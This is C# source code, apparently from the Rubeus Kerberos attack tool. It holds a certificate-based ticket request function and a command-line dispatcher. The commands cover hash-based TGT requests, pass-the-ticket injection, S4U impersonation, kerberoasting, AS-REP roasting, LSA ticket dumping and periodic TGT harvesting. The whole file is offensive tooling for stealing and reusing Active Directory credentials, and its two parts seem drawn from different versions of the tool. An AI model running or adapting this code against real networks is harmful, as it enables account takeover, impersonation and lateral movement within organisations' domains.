public static byte[] TGT(string userName, string domain, string certFile, string certPass, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool verifyCerts = false, string servicekey = "", bool getCredentials = false)
{
try {
X509Certificate2 cert = FindCertificate(certFile, certPass);
// Check for Base64 encoded certificate second in case certFile was a hex-encoded fingerprint
if (cert == null && Helpers.IsBase64String(certFile))
{
cert = new X509Certificate2(Convert.FromBase64String(certFile), certPass);
}
if (cert == null)
{
Console.WriteLine("[!] Failed to find certificate for {0}", certFile);
return(null);
}
KDCKeyAgreement agreement = new KDCKeyAgreement();
Console.WriteLine("[*] Using PKINIT with etype {0} and subject: {1} ", etype, cert.Subject);
Console.WriteLine("[*] Building AS-REQ (w/ PKINIT preauth) for: '{0}\\{1}'", domain, userName);
AS_REQ pkinitASREQ = AS_REQ.NewASReq(userName, domain, cert, agreement, etype, verifyCerts);
return(InnerTGT(pkinitASREQ, etype, outfile, ptt, domainController, luid, describe, true, false, servicekey, getCredentials));
} catch (KerberosErrorException ex) {
KRB_ERROR error = ex.krbError;
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
} catch (RubeusException ex) {
Console.WriteLine("\r\n" + ex.Message + "\r\n");
}
return(null);
}
static void Main(string[] args)
{
Logo();
var arguments = new Dictionary <string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
arguments[argument] = "";
}
}
if (arguments.ContainsKey("asktgt"))
{
string user = "";
string domain = "";
string hash = "";
string dc = "";
bool ptt = false;
uint luid = 0;
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
if (arguments.ContainsKey("/createnetonly"))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
if (arguments.ContainsKey("/show"))
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
}
else
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
}
Console.WriteLine();
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
return;
}
else
{
Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
return;
}
}
if (arguments.ContainsKey("renew"))
{
bool ptt = false;
string dc = "";
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
if (arguments.ContainsKey("/autorenew"))
{
// if we want to auto-renew the TGT up until the renewal limit
Renew.TGTAutoRenew(kirbi, dc);
}
else
{
// otherwise a single renew operation
byte[] blah = Renew.TGT(kirbi, ptt, dc);
}
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
if (arguments.ContainsKey("/autorenew"))
{
// if we want to auto-renew the TGT up until the renewal limit
Renew.TGTAutoRenew(kirbi, dc);
}
else
{
// otherwise a single renew operation
byte[] blah = Renew.TGT(kirbi, ptt, dc);
}
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for renewal!\r\n");
return;
}
}
if (arguments.ContainsKey("s4u"))
{
string targetUser = "";
string targetSPN = "";
string altSname = "";
string user = "";
string domain = "";
string hash = "";
bool ptt = false;
string dc = "";
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/impersonateuser"))
{
targetUser = arguments["/impersonateuser"];
}
if (arguments.ContainsKey("/msdsspn"))
{
targetSPN = arguments["/msdsspn"];
}
if (arguments.ContainsKey("/altservice"))
{
altSname = arguments["/altservice"];
}
if (String.IsNullOrEmpty(targetUser))
{
Console.WriteLine("\r\n[X] You must supply a /impersonateuser to impersonate!\r\n");
return;
}
if (String.IsNullOrEmpty(targetSPN))
{
Console.WriteLine("\r\n[X] You must supply a /msdsspn !\r\n");
return;
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else if (arguments.ContainsKey("/user"))
{
// if the user is supplying a user and rc4/aes256 hash to first execute a TGT request
user = arguments["/user"];
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname);
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for S4U!");
Console.WriteLine("[X] Alternatively, supply a /user and </rc4:X | /aes256:X> hash to first retrieve a TGT.\r\n");
return;
}
}
if (arguments.ContainsKey("ptt"))
{
uint luid = 0;
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
LSA.ImportTicket(kirbiBytes, luid);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
LSA.ImportTicket(kirbiBytes, luid);
}
else
{
Console.WriteLine("\r\n[X]/ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied!\r\n");
return;
}
}
if (arguments.ContainsKey("purge"))
{
uint luid = 0;
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
LSA.Purge(luid);
}
else if (arguments.ContainsKey("kerberoast"))
{
string spn = "";
string user = "";
string OU = "";
if (arguments.ContainsKey("/spn"))
{
spn = arguments["/spn"];
}
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/ou"))
{
OU = arguments["/ou"];
}
if (arguments.ContainsKey("/creduser"))
{
if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase))
{
Console.WriteLine("\r\n[X] /creduser specification must be in fqdn format (domain.com\\user)\r\n");
return;
}
string[] parts = arguments["/creduser"].Split('\\');
string domainName = parts[0];
string userName = parts[1];
if (!arguments.ContainsKey("/credpassword"))
{
Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n");
return;
}
string password = arguments["/credpassword"];
System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);
Roast.Kerberoast(spn, user, OU, cred);
}
else
{
Roast.Kerberoast(spn, user, OU);
}
}
else if (arguments.ContainsKey("asreproast"))
{
string user = "";
string domain = "";
string dc = "";
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(dc))
{
Roast.ASRepRoast(user, domain);
}
else
{
Roast.ASRepRoast(user, domain, dc);
}
}
else if (arguments.ContainsKey("dump"))
{
if (arguments.ContainsKey("/luid"))
{
string service = "";
if (arguments.ContainsKey("/service"))
{
service = arguments["/service"];
}
UInt32 luid = 0;
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
LSA.ListKerberosTicketData(luid, service);
}
else if (arguments.ContainsKey("/service"))
{
LSA.ListKerberosTicketData(0, arguments["/service"]);
}
else
{
LSA.ListKerberosTicketData();
}
}
else if (arguments.ContainsKey("monitor"))
{
string targetUser = "";
int interval = 60;
if (arguments.ContainsKey("/filteruser"))
{
targetUser = arguments["/filteruser"];
}
if (arguments.ContainsKey("/interval"))
{
interval = Int32.Parse(arguments["/interval"]);
}
Harvest.Monitor4624(interval, targetUser);
}
else if (arguments.ContainsKey("harvest"))
{
int intervalMinutes = 60;
if (arguments.ContainsKey("/interval"))
{
intervalMinutes = Int32.Parse(arguments["/interval"]);
}
Harvest.HarvestTGTs(intervalMinutes);
}
else if (arguments.ContainsKey("describe"))
{
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi);
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi /ticket file needs to be supplied!\r\n");
return;
}
}
else if (arguments.ContainsKey("createnetonly"))
{
if (arguments.ContainsKey("/program"))
{
if (arguments.ContainsKey("/show"))
{
LSA.CreateProcessNetOnly(arguments["/program"], true);
}
else
{
LSA.CreateProcessNetOnly(arguments["/program"]);
}
}
else
{
Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n");
}
}
else
{
Usage();
}
}